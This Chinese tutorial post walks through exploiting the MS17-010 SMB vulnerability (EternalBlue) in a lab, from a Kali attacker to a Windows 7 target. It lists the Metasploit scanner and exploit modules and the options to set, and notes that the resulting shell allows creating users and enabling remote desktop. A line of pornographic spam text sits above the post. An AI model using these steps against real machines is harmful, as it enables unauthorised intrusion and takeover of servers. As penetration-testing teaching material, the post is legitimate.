亚洲在线久爱草,狠狠天天香蕉网,天天搞日日干久草,伊人亚洲日本欧美

為了賬號安全,請及時綁定郵箱和手機立即綁定

利用MS17-010漏洞拿下服務器

MS17-010漏洞介绍

    MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。

影响版本

    Windows Vista、Windows Server 2003/2008/2012/2016、Windows XP、Windows 7、Windows 8.1、Windows 10

环境搭建

攻击机:kali2018.4

靶机:windows 7 sp1 X64

win7关闭防火墙

攻击过程

打开kali的msf,使用search命令搜索ms17-010

https://img1.sycdn.imooc.com//5c8852f700019c7708160382.jpg

选择auxiliary/scanner/smb/smb_ms17_010

https://img1.sycdn.imooc.com//5c885323000193c606010045.jpg

使用show options查看需要配置哪些选项

https://img1.sycdn.imooc.com//5c88535c0001578411460398.jpg

配置目标主机:set RHOSTS 192.168.1.2

https://img1.sycdn.imooc.com//5c8853960001b60a07930342.jpg

使用exploit执行,确认(192.168.1.2)存在ms17-010漏洞

https://img1.sycdn.imooc.com//5c8853c7000163bb07220108.jpg

使用攻击模块exploit/windows/smb/ms17_010_eternalblue

https://img1.sycdn.imooc.com//5c8853f00001bf8104630018.jpg

查看需要配置的选项

https://img1.sycdn.imooc.com//5c88547c0001d6bd07890571.jpg

设置目标地址

https://img1.sycdn.imooc.com//5c8854ad000150c906400036.jpg

Exploit开始攻击

https://img1.sycdn.imooc.com//5c8855160001d56907850495.jpg

https://img1.sycdn.imooc.com//5c88559e0001218807830344.jpg

ok,到此已经拿下服务器权限,上图可见已经可以执行cmd命令,可以创建用户,开启3389端口然后远程控制等。

附加信息:我在慕课网上免费课程欢迎大家观看:web渗透测试入门

需要靶机的朋友加我qq:981139459

https://img1.sycdn.imooc.com//5c88567a000134f608550810.jpg

點擊查看更多內容
5人點贊

若覺得本文不錯,就分享一下吧!

評論

作者其他優質文章

正在加載中
感謝您的支持,我會繼續努力的~
掃碼打賞,你說多少就多少
贊賞金額會直接到老師賬戶
支付方式
打開微信掃一掃,即可進行掃碼打賞哦
今天注冊有機會得

100積分直接送

付費專欄免費學

大額優惠券免費領

立即參與 放棄機會
微信客服

購課補貼
聯系客服咨詢優惠詳情

幫助反饋 APP下載

慕課網APP
您的移動學習伙伴

公眾號

掃描二維碼
關注慕課網微信公眾號

舉報

0/150
提交
取消